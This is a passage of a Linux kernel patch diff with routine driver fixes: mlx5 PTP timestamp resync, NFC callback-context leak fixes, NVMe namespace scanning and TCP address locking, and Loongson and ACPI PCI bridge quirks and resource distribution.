+ 		skb_tstamp_tx(skb, &hwts);
+ 		ptpsq->cq_stats->resync_cqe++;
++		napi_consume_skb(skb, budget);
+ 		skb_cc = PTP_WQE_CTR2IDX(ptpsq->skb_fifo_cc);
+ 	}
+ }
+@@ -118,8 +131,14 @@ static void mlx5e_ptp_handle_ts_cqe(struct mlx5e_ptpsq *ptpsq,
+ 		goto out;
+ 	}
+ 
+-	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id))
+-		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id);
++	if (mlx5e_ptp_ts_cqe_drop(ptpsq, skb_cc, skb_id)) {
++		if (mlx5e_ptp_ts_cqe_ooo(ptpsq, skb_id)) {
++			/* already handled by a previous resync */
++			ptpsq->cq_stats->ooo_cqe_drop++;
++			return;
++		}
++		mlx5e_ptp_skb_fifo_ts_cqe_resync(ptpsq, skb_cc, skb_id, budget);
++	}
+ 
+ 	skb = mlx5e_skb_fifo_pop(&ptpsq->skb_fifo);
+ 	hwtstamp = mlx5e_cqe_ts_to_ns(sq->ptp_cyc2time, sq->clock, get_cqe_ts(cqe));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+index 853f312cd7572..1b3a65325ece1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/txrx.h
+@@ -81,7 +81,7 @@ void mlx5e_free_txqsq_descs(struct mlx5e_txqsq *sq);
+ static inline bool
+ mlx5e_skb_fifo_has_room(struct mlx5e_skb_fifo *fifo)
+ {
+-	return (*fifo->pc - *fifo->cc) < fifo->mask;
++	return (u16)(*fifo->pc - *fifo->cc) < fifo->mask;
+ }
+ 
+ static inline bool
+@@ -297,6 +297,8 @@ void mlx5e_skb_fifo_push(struct mlx5e_skb_fifo *fifo, struct sk_buff *skb)
+ static inline
+ struct sk_buff *mlx5e_skb_fifo_pop(struct mlx5e_skb_fifo *fifo)
+ {
++	WARN_ON_ONCE(*fifo->pc == *fifo->cc);
++
+ 	return *mlx5e_skb_fifo_get(fifo, (*fifo->cc)++);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+index 03c1841970f14..f7f54550a8bbc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.c
+@@ -2121,6 +2121,7 @@ static const struct counter_desc ptp_cq_stats_desc[] = {
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, abort_abs_diff_ns) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_cqe) },
+ 	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, resync_event) },
++	{ MLX5E_DECLARE_PTP_CQ_STAT(struct mlx5e_ptp_cq_stats, ooo_cqe_drop) },
+ };
+ 
+ static const struct counter_desc ptp_rq_stats_desc[] = {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+index 9f781085be471..52a67efafcd37 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_stats.h
+@@ -459,6 +459,7 @@ struct mlx5e_ptp_cq_stats {
+ 	u64 abort_abs_diff_ns;
+ 	u64 resync_cqe;
+ 	u64 resync_event;
++	u64 ooo_cqe_drop;
+ };
+ 
+ struct mlx5e_stats {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index b4e263e8cfb87..235f6f0a70523 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -1043,7 +1043,8 @@ mlx5_eswitch_add_send_to_vport_rule(struct mlx5_eswitch *on_esw,
+ 	dest.vport.flags |= MLX5_FLOW_DEST_VPORT_VHCA_ID;
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 
+-	if (rep->vport == MLX5_VPORT_UPLINK)
++	if (MLX5_CAP_ESW_FLOWTABLE(on_esw->dev, flow_source) &&
++	    rep->vport == MLX5_VPORT_UPLINK)
+ 		spec->flow_context.flow_source = MLX5_FLOW_CONTEXT_FLOW_SOURCE_LOCAL_VPORT;
+ 
+ 	flow_rule = mlx5_add_flow_rules(on_esw->fdb_table.offloads.slow_fdb,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+index 23361a9ae4fa0..6dc83e871cd76 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/geneve.c
+@@ -105,6 +105,7 @@ int mlx5_geneve_tlv_option_add(struct mlx5_geneve *geneve, struct geneve_opt *op
+ 		geneve->opt_type = opt->type;
+ 		geneve->obj_id = res;
+ 		geneve->refcount++;
++		res = 0;
+ 	}
+ 
+ unlock:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index 3008e9ce2bbff..20d7662c10fb6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -147,6 +147,10 @@ mlx5_device_disable_sriov(struct mlx5_core_dev *dev, int num_vfs, bool clear_vf)
+ 
+ 	mlx5_eswitch_disable_sriov(dev->priv.eswitch, clear_vf);
+ 
++	/* For ECPFs, skip waiting for host VF pages until ECPF is destroyed */
++	if (mlx5_core_is_ecpf(dev))
++		return;
++
+ 	if (mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_VF]))
+ 		mlx5_core_warn(dev, "timeout reclaiming VFs pages\n");
+ }
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index 1c16548415cdd..b0c7ab74a82ed 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2894,8 +2894,10 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 		goto err_out_clear_quattro;
+ 	}
+ 
+-	hpreg_res = devm_request_region(&pdev->dev, pci_resource_start(pdev, 0),
+-					pci_resource_len(pdev, 0), DRV_NAME);
++	hpreg_res = devm_request_mem_region(&pdev->dev,
++					    pci_resource_start(pdev, 0),
++					    pci_resource_len(pdev, 0),
++					    DRV_NAME);
+ 	if (!hpreg_res) {
+ 		err = -EBUSY;
+ 		dev_err(&pdev->dev, "Cannot obtain PCI resources, aborting.\n");
+diff --git a/drivers/net/mdio/mdio-mscc-miim.c b/drivers/net/mdio/mdio-mscc-miim.c
+index 51f68daac152f..34b87389788bb 100644
+--- a/drivers/net/mdio/mdio-mscc-miim.c
++++ b/drivers/net/mdio/mdio-mscc-miim.c
+@@ -52,6 +52,7 @@ struct mscc_miim_info {
+ struct mscc_miim_dev {
+ 	struct regmap *regs;
+ 	int mii_status_offset;
++	bool ignore_read_errors;
+ 	struct regmap *phy_regs;
+ 	const struct mscc_miim_info *info;
+ 	struct clk *clk;
+@@ -138,7 +139,7 @@ static int mscc_miim_read(struct mii_bus *bus, int mii_id, int regnum)
+ 		goto out;
+ 	}
+ 
+-	if (val & MSCC_MIIM_DATA_ERROR) {
++	if (!miim->ignore_read_errors && !!(val & MSCC_MIIM_DATA_ERROR)) {
+ 		ret = -EIO;
+ 		goto out;
+ 	}
+@@ -218,7 +219,8 @@ static const struct regmap_config mscc_miim_phy_regmap_config = {
+ };
+ 
+ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+-		    struct regmap *mii_regmap, int status_offset)
++		    struct regmap *mii_regmap, int status_offset,
++		    bool ignore_read_errors)
+ {
+ 	struct mscc_miim_dev *miim;
+ 	struct mii_bus *bus;
+@@ -240,6 +242,7 @@ int mscc_miim_setup(struct device *dev, struct mii_bus **pbus, const char *name,
+ 
+ 	miim->regs = mii_regmap;
+ 	miim->mii_status_offset = status_offset;
++	miim->ignore_read_errors = ignore_read_errors;
+ 
+ 	*pbus = bus;
+ 
+@@ -291,7 +294,7 @@ static int mscc_miim_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, PTR_ERR(phy_regmap),
+ 				     "Unable to create phy register regmap\n");
+ 
+-	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0);
++	ret = mscc_miim_setup(dev, &bus, "mscc_miim", mii_regmap, 0, false);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Unable to setup the MDIO bus\n");
+ 		return ret;
+diff --git a/drivers/nfc/st-nci/se.c b/drivers/nfc/st-nci/se.c
+index ec87dd21e054a..b2f1ced8e6dd2 100644
+--- a/drivers/nfc/st-nci/se.c
++++ b/drivers/nfc/st-nci/se.c
+@@ -672,6 +672,12 @@ int st_nci_se_io(struct nci_dev *ndev, u32 se_idx,
+ 					ST_NCI_EVT_TRANSMIT_DATA, apdu,
+ 					apdu_length);
+ 	default:
++		/* Need to free cb_context here as at the moment we can't
++		 * clearly indicate to the caller if the callback function
++		 * would be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nfc/st21nfca/se.c b/drivers/nfc/st21nfca/se.c
+index df8d27cf2956b..dae288bebcb5a 100644
+--- a/drivers/nfc/st21nfca/se.c
++++ b/drivers/nfc/st21nfca/se.c
+@@ -236,6 +236,12 @@ int st21nfca_hci_se_io(struct nfc_hci_dev *hdev, u32 se_idx,
+ 					ST21NFCA_EVT_TRANSMIT_DATA,
+ 					apdu, apdu_length);
+ 	default:
++		/* Need to free cb_context here as at the moment we can't
++		 * clearly indicate to the caller if the callback function
++		 * would be called (and free it) or not. In both cases a
++		 * negative value may be returned to the caller.
++		 */
++		kfree(cb_context);
+ 		return -ENODEV;
+ 	}
+ }
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 5acc9ae225df3..2031fd960549c 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -38,6 +38,7 @@ struct nvme_ns_info {
+ 	bool is_shared;
+ 	bool is_readonly;
+ 	bool is_ready;
++	bool is_removed;
+ };
+ 
+ unsigned int admin_timeout = 60;
+@@ -1439,16 +1440,8 @@ static int nvme_identify_ns(struct nvme_ctrl *ctrl, unsigned nsid,
+ 	error = nvme_submit_sync_cmd(ctrl->admin_q, &c, *id, sizeof(**id));
+ 	if (error) {
+ 		dev_warn(ctrl->device, "Identify namespace failed (%d)\n", error);
+-		goto out_free_id;
++		kfree(*id);
+ 	}
+-
+-	error = NVME_SC_INVALID_NS | NVME_SC_DNR;
+-	if ((*id)->ncap == 0) /* namespace not allocated or attached */
+-		goto out_free_id;
+-	return 0;
+-
+-out_free_id:
+-	kfree(*id);
+ 	return error;
+ }
+ 
+@@ -1462,6 +1455,13 @@ static int nvme_ns_info_from_identify(struct nvme_ctrl *ctrl,
+ 	ret = nvme_identify_ns(ctrl, info->nsid, &id);
+ 	if (ret)
+ 		return ret;
++
++	if (id->ncap == 0) {
++		/* namespace not allocated or attached */
++		info->is_removed = true;
++		return -ENODEV;
++	}
++
+ 	info->anagrpid = id->anagrpid;
+ 	info->is_shared = id->nmic & NVME_NS_NMIC_SHARED;
+ 	info->is_readonly = id->nsattr & NVME_NS_ATTR_RO;
+@@ -4388,6 +4388,7 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ {
+ 	struct nvme_ns_info info = { .nsid = nsid };
+ 	struct nvme_ns *ns;
++	int ret;
+ 
+ 	if (nvme_identify_ns_descs(ctrl, &info))
+ 		return;
+@@ -4404,19 +4405,19 @@ static void nvme_scan_ns(struct nvme_ctrl *ctrl, unsigned nsid)
+ 	 * set up a namespace.  If not fall back to the legacy version.
+ 	 */
+ 	if ((ctrl->cap & NVME_CAP_CRMS_CRIMS) ||
+-	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS)) {
+-		if (nvme_ns_info_from_id_cs_indep(ctrl, &info))
+-			return;
+-	} else {
+-		if (nvme_ns_info_from_identify(ctrl, &info))
+-			return;
+-	}
++	    (info.ids.csi != NVME_CSI_NVM && info.ids.csi != NVME_CSI_ZNS))
++		ret = nvme_ns_info_from_id_cs_indep(ctrl, &info);
++	else
++		ret = nvme_ns_info_from_identify(ctrl, &info);
++
++	if (info.is_removed)
++		nvme_ns_remove_by_nsid(ctrl, nsid);
+ 
+ 	/*
+ 	 * Ignore the namespace if it is not ready. We will get an AEN once it
+ 	 * becomes ready and restart the scan.
+ 	 */
+-	if (!info.is_ready)
++	if (ret || !info.is_ready)
+ 		return;
+ 
+ 	ns = nvme_find_get_ns(ctrl, nsid);
+diff --git a/drivers/nvme/host/fabrics.h b/drivers/nvme/host/fabrics.h
+index a6e22116e1396..dcac3df8a5f76 100644
+--- a/drivers/nvme/host/fabrics.h
++++ b/drivers/nvme/host/fabrics.h
+@@ -189,7 +189,8 @@ nvmf_ctlr_matches_baseopts(struct nvme_ctrl *ctrl,
+ 
+ static inline char *nvmf_ctrl_subsysnqn(struct nvme_ctrl *ctrl)
+ {
+-	if (!ctrl->subsys)
++	if (!ctrl->subsys ||
++	    !strcmp(ctrl->opts->subsysnqn, NVME_DISC_SUBSYS_NAME))
+ 		return ctrl->opts->subsysnqn;
+ 	return ctrl->subsys->subnqn;
+ }
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 1dc7c733c7e39..bb80192c16b6b 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -2488,6 +2488,10 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 
+ 	len = nvmf_get_address(ctrl, buf, size);
+ 
++	mutex_lock(&queue->queue_lock);
++
++	if (!test_bit(NVME_TCP_Q_LIVE, &queue->flags))
++		goto done;
+ 	ret = kernel_getsockname(queue->sock, (struct sockaddr *)&src_addr);
+ 	if (ret > 0) {
+ 		if (len > 0)
+@@ -2495,6 +2499,8 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 		len += scnprintf(buf + len, size - len, "%ssrc_addr=%pISc\n",
+ 				(len) ? "," : "", &src_addr);
+ 	}
++done:
++	mutex_unlock(&queue->queue_lock);
+ 
+ 	return len;
+ }
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index 05c50408f13b7..fe0f732f6e434 100644
+--- a/drivers/pci/controller/pci-loongson.c
++++ b/drivers/pci/controller/pci-loongson.c
+@@ -15,9 +15,14 @@
+ #include "../pci.h"
+ 
+ /* Device IDs */
+-#define DEV_PCIE_PORT_0	0x7a09
+-#define DEV_PCIE_PORT_1	0x7a19
+-#define DEV_PCIE_PORT_2	0x7a29
++#define DEV_LS2K_PCIE_PORT0	0x1a05
++#define DEV_LS7A_PCIE_PORT0	0x7a09
++#define DEV_LS7A_PCIE_PORT1	0x7a19
++#define DEV_LS7A_PCIE_PORT2	0x7a29
++#define DEV_LS7A_PCIE_PORT3	0x7a39
++#define DEV_LS7A_PCIE_PORT4	0x7a49
++#define DEV_LS7A_PCIE_PORT5	0x7a59
++#define DEV_LS7A_PCIE_PORT6	0x7a69
+ 
+ #define DEV_LS2K_APB	0x7a02
+ #define DEV_LS7A_GMAC	0x7a03
+@@ -53,11 +58,11 @@ static void bridge_class_quirk(struct pci_dev *dev)
+ 	dev->class = PCI_CLASS_BRIDGE_PCI_NORMAL;
+ }
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_0, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT0, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_1, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT1, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_2, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT2, bridge_class_quirk);
+ 
+ static void system_bus_quirk(struct pci_dev *pdev)
+ {
+@@ -75,37 +80,33 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_LPC, system_bus_quirk);
+ 
+-static void loongson_mrrs_quirk(struct pci_dev *dev)
++static void loongson_mrrs_quirk(struct pci_dev *pdev)
+ {
+-	struct pci_bus *bus = dev->bus;
+-	struct pci_dev *bridge;
+-	static const struct pci_device_id bridge_devids[] = {
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_0) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_1) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_2) },
+-		{ 0, },
+-	};
+-
+-	/* look for the matching bridge */
+-	while (!pci_is_root_bus(bus)) {
+-		bridge = bus->self;
+-		bus = bus->parent;
+-		/*
+-		 * Some Loongson PCIe ports have a h/w limitation of
+-		 * 256 bytes maximum read request size. They can't handle
+-		 * anything larger than this. So force this limit on
+-		 * any devices attached under these ports.
+-		 */
+-		if (pci_match_id(bridge_devids, bridge)) {
+-			if (pcie_get_readrq(dev) > 256) {
+-				pci_info(dev, "limiting MRRS to 256\n");
+-				pcie_set_readrq(dev, 256);
+-			}
+-			break;
+-		}
+-	}
++	/*
++	 * Some Loongson PCIe ports have h/w limitations of maximum read
++	 * request size. They can't handle anything larger than this. So
++	 * force this limit on any devices attached under these ports.
++	 */
++	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
++
++	bridge->no_inc_mrrs = 1;
+ }
+-DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS2K_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT1, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT2, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT3, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT4, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT5, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT6, loongson_mrrs_quirk);
+ 
+ static void loongson_pci_pin_quirk(struct pci_dev *pdev)
+ {
+diff --git a/drivers/pci/hotplug/pciehp_hpc.c b/drivers/pci/hotplug/pciehp_hpc.c
+index 040ae076ec0e9..112c8f401ac4e 100644
+--- a/drivers/pci/hotplug/pciehp_hpc.c
++++ b/drivers/pci/hotplug/pciehp_hpc.c
+@@ -1086,6 +1086,8 @@ static void quirk_cmd_compl(struct pci_dev *pdev)
+ }
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_INTEL, PCI_ANY_ID,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
++DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x010e,
++			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0110,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0400,
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index a46fec776ad77..1698205dd73cb 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -976,24 +976,41 @@ bool acpi_pci_power_manageable(struct pci_dev *dev)
+ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ {
+ 	struct pci_dev *rpdev;
+-	struct acpi_device *adev;
+-	acpi_status status;
+-	unsigned long long state;
++	struct acpi_device *adev, *rpadev;
+ 	const union acpi_object *obj;
+ 
+ 	if (acpi_pci_disabled || !dev->is_hotplug_bridge)
+ 		return false;
+ 
+-	/* Assume D3 support if the bridge is power-manageable by ACPI. */
+-	if (acpi_pci_power_manageable(dev))
+-		return true;
++	adev = ACPI_COMPANION(&dev->dev);
++	if (adev) {
++		/*
++		 * If the bridge has _S0W, whether or not it can go into D3
++		 * depends on what is returned by that object.  In particular,
++		 * if the power state returned by _S0W is D2 or shallower,
++		 * entering D3 should not be allowed.
++		 */
++		if (acpi_dev_power_state_for_wake(adev) <= ACPI_STATE_D2)
++			return false;
++
++		/*
++		 * Otherwise, assume that the bridge can enter D3 so long as it
++		 * is power-manageable via ACPI.
++		 */
++		if (acpi_device_power_manageable(adev))
++			return true;
++	}
+ 
+ 	rpdev = pcie_find_root_port(dev);
+ 	if (!rpdev)
+ 		return false;
+ 
+-	adev = ACPI_COMPANION(&rpdev->dev);
+-	if (!adev)
++	if (rpdev == dev)
++		rpadev = adev;
++	else
++		rpadev = ACPI_COMPANION(&rpdev->dev);
++
++	if (!rpadev)
+ 		return false;
+ 
+ 	/*
+@@ -1001,15 +1018,15 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * doesn't supply a wakeup GPE via _PRW, it cannot signal hotplug
+ 	 * events from low-power states including D3hot and D3cold.
+ 	 */
+-	if (!adev->wakeup.flags.valid)
++	if (!rpadev->wakeup.flags.valid)
+ 		return false;
+ 
+ 	/*
+-	 * If the Root Port cannot wake itself from D3hot or D3cold, we
+-	 * can't use D3.
++	 * In the bridge-below-a-Root-Port case, evaluate _S0W for the Root Port
++	 * to verify whether or not it can signal wakeup from D3.
+ 	 */
+-	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
+-	if (ACPI_SUCCESS(status) && state < ACPI_STATE_D3_HOT)
++	if (rpadev != adev &&
++	    acpi_dev_power_state_for_wake(rpadev) <= ACPI_STATE_D2)
+ 		return false;
+ 
+ 	/*
+@@ -1018,7 +1035,7 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * bridges *below* that Root Port can also signal hotplug events
+ 	 * while in D3.
+ 	 */
+-	if (!acpi_dev_get_property(adev, "HotPlugSupportInD3",
++	if (!acpi_dev_get_property(rpadev, "HotPlugSupportInD3",
+ 				   ACPI_TYPE_INTEGER, &obj) &&
+ 	    obj->integer.value == 1)
+ 		return true;
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index c20e95fd48cee..98d841a7b45bb 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -6017,6 +6017,7 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ {
+ 	u16 v;
+ 	int ret;
++	struct pci_host_bridge *bridge = pci_find_host_bridge(dev->bus);
+ 
+ 	if (rq < 128 || rq > 4096 || !is_power_of_2(rq))
+ 		return -EINVAL;
+@@ -6035,6 +6036,15 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ 
+ 	v = (ffs(rq) - 8) << 12;
+ 
++	if (bridge->no_inc_mrrs) {
++		int max_mrrs = pcie_get_readrq(dev);
++
++		if (rq > max_mrrs) {
++			pci_info(dev, "can't set Max_Read_Request_Size to %d; max is %d\n", rq, max_mrrs);
++			return -EINVAL;
++		}
++	}
++
+ 	ret = pcie_capability_clear_and_set_word(dev, PCI_EXP_DEVCTL,
+ 						  PCI_EXP_DEVCTL_READRQ, v);
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 20ac67d590348..494fa46f57671 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4835,6 +4835,26 @@ static int pci_quirk_brcm_acs(struct pci_dev *dev, u16 acs_flags)
+ 		PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
+ }
+ 
++/*
++ * Wangxun 10G/1G NICs have no ACS capability, and on multi-function
++ * devices, peer-to-peer transactions are not be used between the functions.
++ * So add an ACS quirk for below devices to isolate functions.
++ * SFxxx 1G NICs(em).
++ * RP1000/RP2000 10G NICs(sp).
++ */
++static int  pci_quirk_wangxun_nic_acs(struct pci_dev *dev, u16 acs_flags)
++{
++	switch (dev->device) {
++	case 0x0100 ... 0x010F:
++	case 0x1001:
++	case 0x2001:
++		return pci_acs_ctrl_enabled(acs_flags,
++			PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
++	}
++
++	return false;
++}
++
+ static const struct pci_dev_acs_enabled {
+ 	u16 vendor;
+ 	u16 device;
+@@ -4980,6 +5000,8 @@ static const struct pci_dev_acs_enabled {
+ 	{ PCI_VENDOR_ID_NXP, 0x8d9b, pci_quirk_nxp_rp_acs },
+ 	/* Zhaoxin Root/Downstream Ports */
+ 	{ PCI_VENDOR_ID_ZHAOXIN, PCI_ANY_ID, pci_quirk_zhaoxin_pcie_ports_acs },
++	/* Wangxun nics */
++	{ PCI_VENDOR_ID_WANGXUN, PCI_ANY_ID, pci_quirk_wangxun_nic_acs },
+ 	{ 0 }
+ };
+ 
+diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c
+index b4096598dbcbb..c690572b10ce7 100644
+--- a/drivers/pci/setup-bus.c
++++ b/drivers/pci/setup-bus.c
+@@ -1765,12 +1765,70 @@ static void adjust_bridge_window(struct pci_dev *bridge, struct resource *res,
+ 		add_size = size - new_size;
+ 		pci_dbg(bridge, "bridge window %pR shrunken by %pa\n", res,
+ 			&add_size);
++	} else {
++		return;
+ 	}
+ 
+ 	res->end = res->start + new_size - 1;
+-	remove_from_list(add_list, res);
++
++	/* If the resource is part of the add_list, remove it now */
++	if (add_list)
++		remove_from_list(add_list, res);
++}
++
++static void remove_dev_resource(struct resource *avail, struct pci_dev *dev,
++				struct resource *res)
++{
++	resource_size_t size, align, tmp;
++
++	size = resource_size(res);
++	if (!size)
++		return;
++
++	align = pci_resource_alignment(dev, res);
++	align = align ? ALIGN(avail->start, align) - avail->start : 0;
++	tmp = align + size;
++	avail->start = min(avail->start + tmp, avail->end + 1);
++}
++
++static void remove_dev_resources(struct pci_dev *dev, struct resource *io,
++				 struct resource *mmio,
++				 struct resource *mmio_pref)
++{
++	int i;
++
++	for (i = 0; i < PCI_NUM_RESOURCES; i++) {
++		struct resource *res = &dev->resource[i];
++
++		if (resource_type(res) == IORESOURCE_IO) {
++			remove_dev_resource(io, dev, res);
++		} else if (resource_type(res) == IORESOURCE_MEM) {
++
++			/*
++			 * Make sure prefetchable memory is reduced from
++			 * the correct resource. Specifically we put 32-bit
++			 * prefetchable memory in non-prefetchable window
++			 * if there is an 64-bit pretchable window.
++			 *
++			 * See comments in __pci_bus_size_bridges() for
++			 * more information.
++			 */
++			if ((res->flags & IORESOURCE_PREFETCH) &&
++			    ((res->flags & IORESOURCE_MEM_64) ==
++			     (mmio_pref->flags & IORESOURCE_MEM_64)))
++				remove_dev_resource(mmio_pref, dev, res);
++			else
++				remove_dev_resource(mmio, dev, res);
++		}
++	}
+ }
+ 
++/*
++ * io, mmio and mmio_pref contain the total amount of bridge window space
++ * available. This includes the minimal space needed to cover all the
++ * existing devices on the bus and the possible extra space that can be
++ * shared with the bridges.
++ */
+ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 					    struct list_head *add_list,
+ 					    struct resource io,
+@@ -1780,7 +1838,7 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 	unsigned int normal_bridges = 0, hotplug_bridges = 0;
+ 	struct resource *io_res, *mmio_res, *mmio_pref_res;
+ 	struct pci_dev *dev, *bridge = bus->self;
+-	resource_size_t io_per_hp, mmio_per_hp, mmio_pref_per_hp, align;
++	resource_size_t io_per_b, mmio_per_b, mmio_pref_per_b, align;
+ 
+ 	io_res = &bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	mmio_res = &bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1824,94 +1882,88 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 			normal_bridges++;
+ 	}
+ 
++	if (!(hotplug_bridges + normal_bridges))
++		return;
++
+ 	/*
+-	 * There is only one bridge on the bus so it gets all available
+-	 * resources which it can then distribute to the possible hotplug
+-	 * bridges below.
++	 * Calculate the amount of space we can forward from "bus" to any
++	 * downstream buses, i.e., the space left over after assigning the
